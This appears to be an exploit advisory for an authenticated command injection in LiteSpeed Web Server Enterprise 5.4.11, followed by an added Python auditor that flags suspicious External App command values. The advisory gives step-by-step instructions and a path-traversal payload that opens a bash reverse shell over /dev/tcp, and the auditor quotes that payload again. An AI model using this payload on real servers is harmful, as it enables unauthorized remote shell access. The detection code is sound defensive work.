LiteSpeed Web Server Enterprise 5.4.11 Command Injection

LiteSpeed Web Server Enterprise version 5.4.11 suffers from an authenticated remote command injection vulnerability.

MD5 | 4ccb7816f0ee2cec9578a104021a7947

# Exploit Title: LiteSpeed Web Server Enterprise 5.4.11 - Command Injection (Authenticated)
# Date: 05/20/2021
# Exploit Author: cmOs - SunCSR
# Vendor Homepage:
# Software Link:
# Version: 5.4.11
# Ubuntu/Kali Linux

Step 1: Log in to the dashboard using the Administrator account.
Step 2: Access Server Configuration > Server > External App > Edit
Step 3: Set the "Start By Server *" value to "Yes (Through CGI Daemon)"
Step 4: Inject the payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'" into the "Command" value
Step 5: Graceful Restart


POST /config/confMgr.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 505
Connection: close
Cookie: LSWSWEBUI=85fa7ba9b37d18d57e41e092a2a2a61f; lsws_uid=j%2FsI8GRiKBc%3D; lsws_pass=c7pC2izvdbQ%3D
Upgrade-Insecure-Requests: 1
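
An added defensive example, not part of the original advisory and not LiteSpeed code: a Python check that audits an External App "Command" value for the traits of the Step 4 string (traversal out of the handler directory, a shell as the executable, shell redirection in the arguments). The server root /usr/local/lsws, the fcgi-bin allow-list, $SERVER_ROOT expansion and the name audit_command are assumptions to adapt to the installation.

```python
import posixpath
import shlex

# Assumptions (not from the advisory): install prefix and the directory
# in which legitimate external-app handlers are expected to live.
SERVER_ROOT = "/usr/local/lsws"
ALLOWED_DIR = posixpath.join(SERVER_ROOT, "fcgi-bin")
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
SHELL_META = set(";|&<>`$")

# The "Command" value quoted in Step 4, kept exactly as the page gives it.
STEP4_VALUE = ("fcgi-bin/lsphp5/../../../../../bin/bash "
               "-c 'bash -i >& /dev/tcp/ 0>&1'")

def audit_command(command):
    """Return a list of findings for one External App "Command" value."""
    try:
        argv = shlex.split(command)
    except ValueError:
        return ["unparseable quoting"]
    if not argv:
        return ["empty command"]
    findings = []
    # Relative paths are taken relative to the server root (assumption).
    exe = argv[0].replace("$SERVER_ROOT", SERVER_ROOT)
    if not exe.startswith("/"):
        exe = posixpath.join(SERVER_ROOT, exe)
    # normpath collapses ".." lexically; it does not follow symlinks.
    resolved = posixpath.normpath(exe)
    if ".." in argv[0].split("/"):
        findings.append("path traversal segment in executable path")
    if not resolved.startswith(ALLOWED_DIR + "/"):
        findings.append("executable resolves outside %s: %s"
                        % (ALLOWED_DIR, resolved))
    if posixpath.basename(resolved) in SHELLS:
        findings.append("executable is a shell interpreter")
    if any(SHELL_META & set(arg) for arg in argv[1:]):
        findings.append("shell metacharacters in arguments")
    return findings

if __name__ == "__main__":
    for value in ("fcgi-bin/lsphp5", STEP4_VALUE):
        print(value, "->", audit_command(value) or "ok")
```

Run it over every configured external application after any WebAdmin change, and treat a finding as a reason to review who holds administrator access to the console.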


